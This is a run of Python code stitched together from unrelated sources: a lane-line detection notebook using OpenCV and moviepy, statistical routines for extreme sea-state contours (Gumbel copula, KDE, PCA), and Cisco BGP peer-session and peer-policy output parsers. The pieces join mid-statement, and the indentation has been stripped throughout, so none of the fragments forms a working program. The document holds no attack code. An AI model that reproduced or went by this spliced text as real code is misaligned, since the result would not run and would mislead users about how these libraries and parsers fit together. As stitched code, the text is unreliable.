# cv2.imshow('edges', edges)
# cv2.waitKey(1000)
# Next we'll create a masked edges image using cv2.fillPoly()
mask = np.zeros_like(edges)
ignore_mask_color = 255
# This time we are defining a four sided polygon to mask
imshape = image.shape
vertices = np.array([[(int(imshape[1]*1/16), int(imshape[0])),
(int(imshape[1] * 7 / 16), int(imshape[0] * 5 / 8)),
(int(imshape[1] * 9 / 16), int(imshape[0] * 5 / 8)),
(int(imshape[1]*15/16), int(imshape[0]))]],
dtype=np.int32)
cv2.fillPoly(mask, vertices, ignore_mask_color)
# cv2.imshow('mask', mask)
# cv2.waitKey(1000)
masked_edges = cv2.bitwise_and(edges, mask)
# cv2.imshow('masked_edges', masked_edges)
# cv2.waitKey(1000)
# Define the Hough transform parameters
# Make a blank the same size as our image to draw on
rho = 2
theta = np.pi / 180
threshold = 50
min_line_length = 25
max_line_gap = 100
# Run Hough on edge detected image
line_image = hough_lines(masked_edges, rho, theta, threshold,
min_line_length, max_line_gap)
# cv2.imshow('line_image', line_image)
# cv2.waitKey(1000)
# # Create a "color" binary image to combine with line image
# color_edges = np.dstack((masked_edges, masked_edges, masked_edges))
# cv2.imshow('color_edges', color_edges)
# cv2.waitKey(1000)
# Draw the lines on the edge image
combo = weighted_img(line_image, image, 0.8, 1, 0)
# cv2.imshow('combo', combo)
# cv2.waitKey(1000)
return combo
IMAGE_DIR = "test_images/"
for imagefile in os.listdir(IMAGE_DIR):
if imagefile.split('.')[-1] == 'jpg':
image = cv2.imread(os.path.join(IMAGE_DIR, imagefile))
cv2.imshow('image', image)
result = lane_finding_pipeline(image)
cv2.imshow('result', result)
cv2.waitKey(3000)
clear_moving_averages()
# ## Test on Videos
#
# You know what's cooler than drawing lanes over images? Drawing lanes over video!
#
# We can test our solution on two provided videos:
#
# `solidWhiteRight.mp4`
#
# `solidYellowLeft.mp4`
#
# **Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
#
# **If you get an error that looks like this:**
# ```
# NeedDownloadError: Need ffmpeg exe.
# You can download it by calling:
# imageio.plugins.ffmpeg.download()
# ```
# **Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**
# In[ ]:
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# In[ ]:
def process_image(image):
# NOTE: The output you return should be a color image (3 channel) for processing video below
# TODO: put your pipeline here,
# you should return the final output (image where lines are drawn on lanes)
result = lane_finding_pipeline(image)
return result
# Let's try the one with the solid white lane on the right first ...
# In[ ]:
white_output = 'test_videos_output/solidWhiteRight.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) # NOTE: this function expects color images!!
clear_moving_averages()
class timeit():
from datetime import datetime
def __enter__(self):
self.tic = self.datetime.now()
def __exit__(self, *args, **kwargs):
print('runtime: {}'.format(self.datetime.now() - self.tic))
# get_ipython().magic(u'time white_clip.write_videofile(white_output, audio=False)')
with timeit():
white_clip.write_videofile(white_output, audio=False)
# Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.
# In[ ]:
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(white_output))
# ## Improve the draw_lines() function
#
# **At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4".**
#
# **Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line over the right lane line.**
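# A minimal sketch of the extrapolation step described above (not part of the
# original notebook): given an averaged slope and intercept for one lane line,
# solve x = (y - intercept) / slope at the bottom of the frame and at 5/8 of the
# frame height, which gives the two endpoints of a single solid line. The helper
# name below is hypothetical.
def extrapolate_lane_line(slope, intercept, img_height):
    y1 = img_height - 1
    y2 = int(img_height * 5 / 8)
    x1 = int((y1 - intercept) / slope)
    x2 = int((y2 - intercept) / slope)
    return [[x1, y1, x2, y2]]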
            if nextHs == maxHs:
break
startingPoint = sortedTBuoy.T[0]
hsBin1.append(sortedTBuoy.Hs[0])
tBin1.append(sortedTBuoy.T[0])
while True:
tempNextBinTs = sortedTBuoy.T[sortedTBuoy.T < startingPoint + tStepSize]
tempNextBinHs = sortedTBuoy.Hs[sortedTBuoy.T < startingPoint + tStepSize]
nextBinTs = tempNextBinTs[tempNextBinTs > startingPoint]
nextBinHs = tempNextBinHs[tempNextBinTs > startingPoint]
try:
nextHs = min(nextBinHs)
nextT = nextBinTs[nextBinHs.argmin(axis=0)]
hsBin1.append(nextHs)
tBin1.append(nextT)
startingPoint = nextT
except ValueError:
startingPoint += tStepSize
break
if nextHs == minHs:
break
startingPoint = sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)]
hsBin3.append(sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)])
tBin3.append(sortedHsBuoy.T[sortedHsBuoy.T.argmax(axis=0)])
while True:
tempNextBinTs = sortedHsBuoy.T[sortedHsBuoy.Hs < startingPoint + hsStepSize]
tempNextBinHs = sortedHsBuoy.Hs[sortedHsBuoy.Hs < startingPoint + hsStepSize]
nextBinTs = tempNextBinTs[tempNextBinHs > startingPoint]
nextBinHs = tempNextBinHs[tempNextBinHs > startingPoint]
try:
nextT = max(nextBinTs)
nextHs = nextBinHs[nextBinTs.argmax(axis=0)]
if nextHs not in hsBin4 and nextHs not in hsBin1:
hsBin3.append(nextHs)
tBin3.append(nextT)
startingPoint = nextHs
except ValueError:
startingPoint += hsStepSize
break
if nextHs == maxHs:
break
startingPoint = sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)]
while True:
tempNextBinTs = sortedHsBuoy.T[sortedHsBuoy.Hs > startingPoint - hsStepSize]
tempNextBinHs = sortedHsBuoy.Hs[sortedHsBuoy.Hs > startingPoint - hsStepSize]
nextBinTs = tempNextBinTs[tempNextBinHs < startingPoint]
nextBinHs = tempNextBinHs[tempNextBinHs < startingPoint]
try:
nextT = max(nextBinTs)
nextHs = nextBinHs[nextBinTs.argmax(axis=0)]
if nextHs not in hsBin1 and nextHs not in hsBin4:
hsBin2.append(nextHs)
tBin2.append(nextT)
startingPoint = nextHs
except ValueError:
startingPoint = startingPoint - hsStepSize
break
if nextHs == minHs:
break
hsBin2 = hsBin2[::-1] # Reverses the order of the array
tBin2 = tBin2[::-1]
hsBin4 = hsBin4[::-1] # Reverses the order of the array
tBin4 = tBin4[::-1]
dataBoundryHs = np.concatenate((hsBin1,hsBin2,hsBin3,hsBin4),axis = 0)
dataBoundryT = np.concatenate((tBin1,tBin2,tBin3,tBin4),axis = 0)
dataBoundryHs = dataBoundryHs[::-1]
dataBoundryT = dataBoundryT[::-1]
return(dataBoundryHs, dataBoundryT)
def __getCopulaParams(self,n_size,bin_1_limit,bin_step):
sorted_idx = sorted(range(len(self.buoy.Hs)),key=lambda x:self.buoy.Hs[x])
Hs = self.buoy.Hs[sorted_idx]
T = self.buoy.T[sorted_idx]
# Estimate parameters for Weibull distribution for component 1 (Hs) using MLE
# Estimate parameters for Lognormal distribution for component 2 (T) using MLE
para_dist_1=stats.exponweib.fit(Hs,floc=0,fa=1)
para_dist_2=stats.norm.fit(np.log(T))
# Binning
ind = np.array([])
ind = np.append(ind,sum(Hs_val <= bin_1_limit for Hs_val in Hs))
# Make sure first bin isn't empty or too small to avoid errors
while ind == 0 or ind < n_size:
ind = np.array([])
bin_1_limit = bin_1_limit + bin_step
ind = np.append(ind,sum(Hs_val <= bin_1_limit for Hs_val in Hs))
for i in range(1,200):
bin_i_limit = bin_1_limit+bin_step*(i)
ind = np.append(ind,sum(Hs_val <= bin_i_limit for Hs_val in Hs))
            if (ind[i] - ind[i-1]) < n_size:
break
# Parameters for conditional distribution of T|Hs for each bin
num=len(ind) # num+1: number of bins
para_dist_cond = []
hss = []
para_dist_cond.append(stats.norm.fit(np.log(T[range(0,int(ind[0]))]))) # parameters for first bin
hss.append(np.mean(Hs[range(0,int(ind[0])-1)])) # mean of Hs (component 1 for first bin)
para_dist_cond.append(stats.norm.fit(np.log(T[range(0,int(ind[1]))]))) # parameters for second bin
hss.append(np.mean(Hs[range(0,int(ind[1])-1)])) # mean of Hs (component 1 for second bin)
for i in range(2,num):
para_dist_cond.append(stats.norm.fit(np.log(T[range(int(ind[i-2]),int(ind[i]))])));
hss.append(np.mean(Hs[range(int(ind[i-2]),int(ind[i]))]))
# Estimate coefficient using least square solution (mean: third order, sigma: 2nd order)
para_dist_cond.append(stats.norm.fit(np.log(T[range(int(ind[num-2]),int(len(Hs)))]))); # parameters for last bin
hss.append(np.mean(Hs[range(int(ind[num-2]),int(len(Hs)))])) # mean of Hs (component 1 for last bin)
para_dist_cond = np.array(para_dist_cond)
hss = np.array(hss)
phi_mean = np.column_stack((np.ones(num+1),hss[:],hss[:]**2,hss[:]**3))
phi_std = np.column_stack((np.ones(num+1),hss[:],hss[:]**2))
# Estimate coefficients of mean of Ln(T|Hs)(vector 4x1) (cubic in Hs)
mean_cond = np.linalg.lstsq(phi_mean,para_dist_cond[:,0])[0]
# Estimate coefficients of standard deviation of Ln(T|Hs) (vector 3x1) (quadratic in Hs)
std_cond = np.linalg.lstsq(phi_std,para_dist_cond[:,1])[0]
return para_dist_1, para_dist_2, mean_cond, std_cond
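    # For reference (not in the original source): the two least-squares fits above
    # amount to modelling ln(T) | Hs as normally distributed with
    #     mu(Hs)    = a0 + a1*Hs + a2*Hs**2 + a3*Hs**3   (coefficients in mean_cond)
    #     sigma(Hs) = b0 + b1*Hs + b2*Hs**2              (coefficients in std_cond)
    # where the per-bin (mu, sigma) pairs in para_dist_cond are regressed against
    # the per-bin mean Hs values stored in hss.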
def __getNonParaCopulaParams(self,Ndata, max_T, max_Hs):
sorted_idx = sorted(range(len(self.buoy.Hs)),key=lambda x:self.buoy.Hs[x])
Hs = self.buoy.Hs[sorted_idx]
T = self.buoy.T[sorted_idx]
        # Calculate KDE bounds (this may be added as an input later)
min_limit_1 = 0
max_limit_1 = max_Hs
min_limit_2 = 0
max_limit_2 = max_T
# Discretize for KDE
pts_hs = np.linspace(min_limit_1, max_limit_1, self.Ndata)
pts_t = np.linspace(min_limit_2, max_limit_2, self.Ndata)
# Calculate optimal bandwidth for T and Hs
sig = robust.scale.mad(T)
num = float(len(T))
bwT = sig*(4.0/(3.0*num))**(1.0/5.0)
sig = robust.scale.mad(Hs)
num = float(len(Hs))
bwHs = sig*(4.0/(3.0*num))**(1.0/5.0)
# Nonparametric PDF for T
temp = sm.nonparametric.KDEUnivariate(T)
temp.fit(bw = bwT)
f_t = temp.evaluate(pts_t)
# Nonparametric CDF for Hs
temp = sm.nonparametric.KDEUnivariate(Hs)
temp.fit(bw = bwHs)
tempPDF = temp.evaluate(pts_hs)
F_hs = tempPDF/sum(tempPDF)
F_hs = np.cumsum(F_hs)
# Nonparametric CDF for T
F_t = f_t/sum(f_t)
F_t = np.cumsum(F_t)
nonpara_dist_1 = np.transpose(np.array([pts_hs, F_hs]))
nonpara_dist_2 = np.transpose(np.array([pts_t, F_t]))
nonpara_pdf_2 = np.transpose(np.array([pts_t, f_t]))
return nonpara_dist_1, nonpara_dist_2, nonpara_pdf_2
def __gumbelCopula(self, u, alpha):
''' Calculates the Gumbel copula density
Parameters
----------
u: np.array
Vector of equally spaced points between 0 and twice the
maximum value of T.
alpha: float
Copula parameter. Must be greater than or equal to 1.
Returns
-------
y: np.array
Copula density function.
'''
#Ignore divide by 0 warnings and resulting NaN warnings
np.seterr(all='ignore')
v = -np.log(u)
v = np.sort(v, axis=0)
vmin = v[0, :]
vmax = v[1, :]
nlogC = vmax * (1 + (vmin / vmax) ** alpha) ** (1 / alpha)
y = (alpha - 1 +nlogC)*np.exp(-nlogC+np.sum((alpha-1)*np.log(v)+v, axis =0) +(1-2*alpha)*np.log(nlogC))
np.seterr(all='warn')
return(y)
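    # For reference (not in the original docstring): the bivariate Gumbel copula is
    #     C(u1, u2; alpha) = exp(-((-ln u1)**alpha + (-ln u2)**alpha)**(1/alpha)),  alpha >= 1,
    # and `nlogC` above is -ln C(u1, u2; alpha), computed in a numerically stable way by
    # factoring out the larger of the two -ln(u) terms; the returned `y` is the
    # corresponding copula density evaluated along the two rows of `u`.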
class PCA(EA):
def __init__(self, buoy, size_bin=250.):
'''
Create a PCA EA class for a buoy object. Contours generated under this
class will use principal component analysis (PCA) with improved
distribution fitting (Eckert et. al 2015) and the I-FORM.
Parameters
___________
size_bin : float
chosen bin size
buoy : NDBCData
ESSC.Buoy Object
'''
self.method = "Principle component analysis"
self.buoy = buoy
if size_bin > len(buoy.Hs)*0.25:
self.size_bin = len(buoy.Hs)*0.25
print(round(len(buoy.Hs)*0.25,2),'is the max bin size for this buoy. The bin size has been set to this amount.')
else:
self.size_bin = size_bin
self.Hs_ReturnContours = None
self.Hs_SampleCA = None
self.Hs_SampleFSS = None
self.T_ReturnContours = None
self.T_SampleCA = None
self.T_SampleFSS = None
self.Weight_points = None
self.coeff, self.shift, self.comp1_params, self.sigma_param, self.mu_param = self.__generateParams(self.size_bin)
def __generateParams(self, size_bin=250.0):
pca = skPCA(n_components=2)
pca.fit(np.array((self.buoy.Hs - self.buoy.Hs.mean(axis=0), self.buoy.T - self.buoy.T.mean(axis=0))).T)
coeff = abs(pca.components_) # Apply correct/expected sign convention
coeff[1, 1] = -1.0 * coeff[1, 1] # Apply correct/expected sign convention
        Comp1_Comp2 = np.dot(np.array((self.buoy.Hs, self.buoy.T)).T, coeff)
        shift = abs(min(Comp1_Comp2[:, 1])) + 0.1  # Calculate shift
# Apply shift to Component 2 to make all values positive
Comp1_Comp2[:, 1] = Comp1_Comp2[:, 1] + shift
Comp1_Comp2_sort = Comp1_Comp2[Comp1_Comp2[:, 0].argsort(), :]
# Fitting distribution of component 1
comp1_params = stats.invgauss.fit(Comp1_Comp2_sort[:, 0], floc=0)
n_data = len(self.buoy.Hs) # Number of observations
edges = np.hstack((np.arange(0, size_bin * np.ceil(n_data / size_bin),
size_bin), n_data + 1))
ranks = np.arange(n_data)
hist_count, _ = np.histogram(ranks, bins=edges)
bin_inds = np.digitize(ranks, bins=edges) - 1
Comp2_bins_params = np.zeros((2, int(max(bin_inds) + 1)))
Comp1_mean = np.array([])
for bin_loop in range(np.max(bin_inds) + 1):
mask_bins = bin_inds == bin_loop # Find location of bin values
Comp2_bin = np.sort(Comp1_Comp2_sort[mask_bins, 1])
Comp1_mean = np.append(Comp1_mean,
np.mean(Comp1_Comp2_sort[mask_bins, 0]))
            # Calculate normal distribution parameters for C2 in each bin
Comp2_bins_params[:, bin_loop] = np.array(stats.norm.fit(Comp2_bin))
mu_param, pcov = optim.curve_fit(self.__mu_fcn,
Comp1_mean.T, Comp2_bins_params[0, :])
sigma_param = self.__sigma_fits(Comp1_mean, Comp2_bins_params[1, :])
return coeff, shift, comp1_params, sigma_param, mu_param
def _saveParams(self, groupObj):
if('nb_steps' in groupObj):
groupObj['nb_steps'][...] = self.nb_steps
else:
groupObj.create_dataset('nb_steps', data=self.nb_steps)
if('time_r' in groupObj):
groupObj['time_r'][...] = self.time_r
else:
groupObj.create_dataset('time_r', data=self.time_r)
if('time_ss' in groupObj):
groupObj['time_ss'][...] = self.time_ss
else:
groupObj.create_dataset('time_ss', data=self.time_ss)
if('coeff' in groupObj):
groupObj['coeff'][...] = self.coeff
else:
groupObj.create_dataset('coeff', data=self.coeff)
if('shift' in groupObj):
groupObj['shift'][...] = self.shift
else:
groupObj.create_dataset('shift', data=self.shift)
if('comp1_params' in groupObj):
groupObj['comp1_params'][...] = self.comp1_params
else:
groupObj.create_dataset('comp1_params', data=self.comp1_params)
if('sigma_param' in groupObj):
groupObj['sigma_param'][...] = self.sigma_param
else:
groupObj.create_dataset('sigma_param', data=self.sigma_param)
if('mu_param' in groupObj):
groupObj['mu_param'][...] = self.mu_param
else:
groupObj.create_dataset('mu_param', data=self.mu_param)
def getContours(self, time_ss, time_r, nb_steps=1000):
'''WDRT Extreme Sea State PCA Contour function
This function calculates environmental contours of extreme sea states using
principal component analysis and the inverse first-order reliability
method.
Parameters
___________
time_ss : float
Sea state duration (hours) of measurements in input.
time_r : np.array
Desired return period (years) for calculation of environmental
contour, can be a scalar or a vector.
nb_steps : int
Discretization of the circle in the normal space used for
inverse FORM calculation.
Returns
-------
Hs_Return : np.array
Calculated Hs values along the contour boundary following
return to original input orientation.
T_Return : np.array
Calculated T values along the contour boundary following
return to original input orientation.
nb_steps : float
Discretization of the circle in the normal space
Example
-------
        To
configured
m = p5.match(line)
if m:
password_text = m.groupdict()['password_text']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['password_text'] = password_text
else:
parsed_dict['peer_session'][template_id]['password_text'] = password_text
continue
# shutdown
m = p6.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['shutdown'] = True
else:
parsed_dict['peer_session'][template_id]['shutdown'] = True
continue
# ebgp-multihop 254
m = p7.match(line)
if m:
ebgp_multihop_max_no = int(m.groupdict()['ebgp_multihop_max_no'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['ebgp_multihop_max_hop'] = ebgp_multihop_max_no
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['ebgp_multihop_enable'] = True
else:
parsed_dict['peer_session'][template_id]['ebgp_multihop_max_hop'] = ebgp_multihop_max_no
parsed_dict['peer_session'][template_id]['ebgp_multihop_enable'] = True
continue
# update-source Loopback0
m = p8.match(line)
if m:
update_source = m.groupdict()['update_source']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['update_source'] = update_source
else:
parsed_dict['peer_session'][template_id]['update_source'] = update_source
continue
# transport connection-mode passive
m = p9.match(line)
if m:
transport_connection_mode = m.groupdict()['transport_connection_mode']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['transport_connection_mode'] = transport_connection_mode
else:
parsed_dict['peer_session'][template_id]['transport_connection_mode'] \
= transport_connection_mode
continue
# description desc1!
m = p10.match(line)
if m:
description = m.groupdict()['desc']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['description'] = description
else:
parsed_dict['peer_session'][template_id]['description'] \
= description
continue
# dont-capability-negotiate four-octets-as
m = p11.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['suppress_four_byte_as_capability'] = True
else:
parsed_dict['peer_session'][template_id]['suppress_four_byte_as_capability'] \
= True
continue
# timers 10 30
m = p12.match(line)
if m:
keepalive_interval = int(m.groupdict()['keepalive_interval'])
holdtime = int(m.groupdict()['holdtime'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['keepalive_interval'] = keepalive_interval
parsed_dict['peer_session'][template_id]['inherited_session_commands']['holdtime'] \
= holdtime
else:
parsed_dict['peer_session'][template_id]['keepalive_interval'] \
= keepalive_interval
parsed_dict['peer_session'][template_id]['holdtime'] \
= holdtime
continue
# local-as 255
m = p13.match(line)
if m:
local_as_as_no = int(m.groupdict()['local_as_as_no'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['local_as_as_no'] = local_as_as_no
else:
parsed_dict['peer_session'][template_id]['local_as_as_no'] = local_as_as_no
continue
# disable-connected-check
m = p14.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['disable_connected_check'] = True
else:
parsed_dict['peer_session'][template_id]['disable_connected_check'] = True
continue
# fall-over bfd
m = p15.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['fall_over_bfd'] = True
else:
parsed_dict['peer_session'][template_id]['fall_over_bfd'] = True
continue
# Inherited session commands:
m = p16.match(line)
if m:
if 'inherited_session_commands' not in parsed_dict['peer_session'][template_id]:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] = {}
flag = True
continue
if parsed_dict:
for key, value in parsed_dict['peer_session'].items():
if 'inherited_session_commands' in parsed_dict['peer_session'][key]:
if not len(parsed_dict['peer_session'][key]['inherited_session_commands']):
del parsed_dict['peer_session'][key]['inherited_session_commands']
return parsed_dict
#-------------------------------------------------------------------------------
# ======================================================
# Schema for:
# * 'show ip bgp template peer-policy {template_name}'
# ======================================================
class ShowIpBgpTemplatePeerPolicySchema(MetaParser):
''' Schema for "show ip bgp template peer-policy {template_name}" '''
schema = {
'peer_policy':
{Any():
{Optional('local_policies'): str,
Optional('inherited_polices'): str,
Optional('local_disable_policies'): str,
Optional('inherited_disable_polices'): str,
Optional('allowas_in'): bool ,
Optional('allowas_in_as_number'): int,
Optional('as_override'): bool,
Optional('default_originate'): bool,
Optional('default_originate_route_map'): str,
Optional('route_map_name_in'): str,
Optional('route_map_name_out'): str,
Optional('maximum_prefix_max_prefix_no'): int,
Optional('maximum_prefix_threshold'): int,
Optional('maximum_prefix_restart'): int,
Optional('maximum_prefix_warning_only'): bool,
Optional('next_hop_self'): bool,
Optional('route_reflector_client'): bool,
Optional('send_community'): str,
Optional('soft_reconfiguration'): bool,
Optional('soo'): str,
Optional('index'): int,
Optional('inherited_policies'):
{Optional('allowas_in'): bool,
Optional('allowas_in_as_number'): int,
Optional('as_override'): bool,
Optional('default_originate'): bool,
Optional('default_originate_route_map'): str,
Optional('route_map_name_in'): str,
Optional('route_map_name_out'): str,
Optional('maximum_prefix_max_prefix_no'): int,
Optional('maximum_prefix_threshold'): int,
Optional('maximum_prefix_restart'): int,
Optional('maximum_prefix_warning_only'): bool,
Optional('next_hop_self'): bool,
Optional('route_reflector_client'): bool,
Optional('send_community'): str,
Optional('soft_reconfiguration'): bool,
Optional('soo'): str,
},
},
},
}
# ======================================================
# Parser for:
# * 'show ip bgp template peer-policy {template_name}'
# ======================================================
class ShowIpBgpTemplatePeerPolicy(ShowIpBgpTemplatePeerPolicySchema):
''' Parser for "show ip bgp template peer-policy {template_name}" '''
cli_command = ['show ip bgp template peer-policy {template_name}', 'show ip bgp template peer-policy']
def cli(self, template_name="", output=None):
# show ip bgp template peer-policy <WORD>
if output is None:
if template_name:
cmd = self.cli_command[0].format(template_name=template_name)
else:
cmd = self.cli_command[1]
out = self.device.execute(cmd)
else:
out = output
p1 = re.compile(r'^\s*Template:+(?P<template_id>[0-9\s\S\w]+),'
' +index:(?P<index>[0-9]+).$')
p2 = re.compile(r'^\s*Local +policies:+(?P<local_policies>0x[0-9A-F]+),'
' +Inherited +polices:+(?P<inherited_polices>0x[0-9A-F]+)$')
p3 = re.compile(r'^\s*Local +disable +policies:+(?P<local_disable_policies>0x[0-9A-F]+),'
' +Inherited +disable +policies:+(?P<inherited_disable_polices>0x[0-9A-F]+)$')
p4 = re.compile(r'^\s*Locally +configured +policies:$')
p5 = re.compile(r'^\s*route-map +(?P<remote_map_in>[0-9a-zA-Z]+) +in$')
p6 = re.compile(r'^\s*route-map +(?P<route_map_out>[0-9a-zA-Z]+) +out$')
p7 = re.compile(r'^\s*default-originate +route-map'
' +(?P<default_originate_route_map>[0-9a-zA-Z]+)$')
p8 = re.compile(r'^\s*soft-reconfiguration'
' +(?P<soft_reconfiguration>[a-zA-Z]+)$')
p9 = re.compile(r'^\s*maximum-prefix'
' +(?P<maximum_prefix_max_prefix_no>[0-9]+)'
' ?(?P<maximum_prefix_threshold>[0-9]+)?'
' +restart +(?P<maximum_prefix_restart>[0-9]+)$')
p10 = re.compile(r'^\s*as-override$')
p11 = re.compile(r'^\s*allowas-in +(?P<allowas_in_as_number>[0-9]+)$')
p12 = re.compile(r'^\s*route-reflector-client$')
p13 = re.compile(r'^\s*next-hop-self$')
p14 = re.compile(r'^\s*send-community +(?P<send_community>[\w]+)$')
p15 = re.compile(r'^\s*soo +(?P<soo>[\w\:\d]+)$')
p16 = re.compile(r'^\s*Inherited policies:$')
# Init vars
parsed_dict = {}
for line in out.splitlines():
if line.strip():
line = line.rstrip()
else:
continue
# Template:PEER-POLICY, index:1.
m = p1.match(line)
if m:
template_id = m.groupdict()['template_id']
index = int(m.groupdict()['index'])
if 'peer_policy' not in parsed_dict:
parsed_dict['peer_policy'] = {}
if template_id not in parsed_dict['peer_policy']:
parsed_dict['peer_policy'][template_id] = {}
parsed_dict['peer_policy'][template_id]['index'] = index
continue
# Local policies:0x8002069C603, Inherited polices:0x0
m = p2.match(line)
if m:
local_policy = m.groupdict()['local_policies']
inherited_policy = m.groupdict()['inherited_polices']
parsed_dict['peer_policy'][template_id]['local_policies'] = local_policy
parsed_dict['peer_policy'][template_id]['inherited_polices'] = inherited_policy
continue
# Local disable policies:0x0, Inherited disable policies:0x0
m = p3.match(line)
if m:
local_policy = m.groupdict()['local_disable_policies']
inherited_policy = m.groupdict()['inherited_disable_polices']
parsed_dict['peer_policy'][template_id]['local_disable_policies'] = local_policy
parsed_dict['peer_policy'][template_id]['inherited_disable_polices'] = inherited_policy
continue
#Locally configured policies:
m = p4.match(line)
if m:
flag = False
continue
# route-map test in
m = p5.match(line)
if m:
route_map_in = m.groupdict()['remote_map_in']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies'] \
['route_map_name_in'] = route_map_in
else:
parsed_dict['peer_policy'][template_id]['route_map_name_in'] = route_map_in
continue
# route-map test2 out
m = p6.match(line)
if m:
route_map_out = m.groupdict()['route_map_out']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['route_map_name_out'] = route_map_out
else:
parsed_dict['peer_policy'][template_id]['route_map_name_out'] = route_map_out
continue
# default-originate route-map test
m = p7.match(line)
if m:
default_originate_route_map = m.groupdict()['default_originate_route_map']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['default_originate'] = True
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['default_originate_route_map'] = default_originate_route_map
else:
parsed_dict['peer_policy'][template_id]['default_originate'] = True
parsed_dict['peer_policy'][template_id]['default_originate_route_map'] = \
default_originate_route_map
continue
# soft-reconfiguration inbound
m = p8.match(line)
if m:
                soft_reconfiguration = m.groupdict()['soft_reconfiguration']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['soft_reconfiguration'] \
= True
else:
parsed_dict['peer_policy'][template_id]['soft_reconfiguration'] \
= True
continue
# maximum-prefix 5555 70 restart 300
m = p9.match(line)
if m:
maximum_prefix_max_prefix_no = int(m.groupdict()['maximum_prefix_max_prefix_no'])
maximum_prefix_restart = int(m.groupdict()['maximum_prefix_restart'])
maximum_prefix_threshold = m.groupdict()['maximum_prefix_threshold']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_max_prefix_no'] \
= maximum_prefix_max_prefix_no
if maximum_prefix_threshold:
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_threshold'] \
= int(maximum_prefix_threshold)
parsed_dict['peer_policy'][template_id]['inherited_policies']['maximum_prefix_restart'] \
= maximum_prefix_restart
else:
parsed_dict['peer_policy'][template_id]['maximum_prefix_max_prefix_no'] \
= maximum_prefix_max_prefix_no
if maximum_prefix_threshold:
parsed_dict['peer_policy'][template_id]['maximum_prefix_threshold'] \
= int(maximum_prefix_threshold)
parsed_dict['peer_policy'][template_id]['maximum_prefix_restart'] \
= maximum_prefix_restart
continue
# as-override
m = p10.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['as_override'] = True
else:
parsed_dict['peer_policy'][template_id]['as_override'] = True
continue
# allowas-in 9
m = p11.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['allowas_in'] = True
parsed_dict['peer_policy'][template_id]['inherited_policies']['allowas_in_as_number'] = \
int(m.groupdict()['allowas_in_as_number'])
else:
parsed_dict['peer_policy'][template_id]['allowas_in'] = True
parsed_dict['peer_policy'][template_id]['allowas_in_as_number'] = \
int(m.groupdict()['allowas_in_as_number'])
continue
# route-reflector-client
m = p12.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['route_reflector_client'] = True
else:
parsed_dict['peer_policy'][template_id]['route_reflector_client'] = True
continue
# next-hop-self
m = p13.match(line)
if m:
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['next_hop_self'] = True
else:
parsed_dict['peer_policy'][template_id]['next_hop_self'] = True
continue
# send-community both
m = p14.match(line)
if m:
send_community = m.groupdict()['send_community']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']\
['send_community'] = send_community
else:
parsed_dict['peer_policy'][template_id]['send_community'] = send_community
continue
# soo SoO:100:100
m = p15.match(line)
if m:
soo = m.groupdict()['soo']
if flag:
parsed_dict['peer_policy'][template_id]['inherited_policies']['soo'] = soo
else:
parsed_dict['peer_policy'][template_id]['soo'] = soo
continue
# Inherited policies:
m = p16.match(line)
if m:
if 'inherited_policies' not in parsed_dict['peer_policy'][template_id]:
parsed_dict['peer_policy'][template_id]['inherited_policies'] = {}
flag = True
continue
if parsed_dict:
for key, value in parsed_dict['peer_policy'].items():
if 'inherited_policies' in parsed_dict['peer_policy'][key]:
if not len(parsed_dict['peer_policy'][key]['inherited_policies']):
del parsed_dict['peer_policy'][key]['inherited_policies']
return parsed_dict
